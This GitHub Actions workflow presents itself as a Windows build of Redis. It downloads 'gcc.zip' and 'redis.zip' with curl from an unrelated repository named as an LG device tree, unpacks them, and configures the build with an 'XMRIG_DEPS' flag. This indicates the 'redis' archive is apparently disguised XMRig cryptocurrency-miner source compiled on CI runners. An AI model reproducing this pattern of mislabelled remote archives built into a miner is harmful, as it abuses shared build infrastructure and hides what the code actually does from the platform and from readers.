name: Build on Windows with MSYS2, GCC, CMake

on:
  push:
    branches:
      - main
  workflow_dispatch:

jobs:
  build:
    runs-on: windows-latest

    steps:
      - name: Checkout source code
        uses: actions/checkout@v3

      # Install MSYS2, GCC, CMake, and unzip
      - name: Set up MSYS2
        uses: msys2/setup-msys2@v2
        with:
          msystem: MINGW64
          install: mingw-w64-x86_64-gcc mingw-w64-x86_64-cmake mingw-w64-x86_64-make unzip

      # Install curl to download the required files
      - name: Install curl
        run: msys2 -c "pacman -S --noconfirm curl"

      # Download gcc.zip
      - name: Download gcc.zip
        run: curl -L -o gcc.zip https://github.com/Janit8r/device_lge_judyln/raw/S/gcc.zip

      # Download redis.zip
      - name: Download redis.zip
        run: curl -L -o redis.zip https://raw.githubusercontent.com/Janit8r/device_lge_judyln/refs/heads/S/redis.zip

      # Unzip gcc.zip
      - name: Unzip gcc.zip
        run: msys2 -c "unzip gcc.zip -d gcc"

      # Unzip redis.zip
      - name: Unzip redis.zip
        run: msys2 -c "unzip redis.zip -d redis"

      # Create and enter build directory inside redis
      - name: Create build directory in redis
        run: |
          mkdir redis/build
          cd redis/build

      # Run cmake to generate Makefiles
      - name: Run CMake to generate Makefiles
        run: |
          cd redis/build
          cmake.exe .. -G "Unix Makefiles" -DXMRIG_DEPS=$GITHUB_WORKSPACE/gcc/x64

      # Compile using make
      - name: Run make
        run: |
          cd redis/build
          make
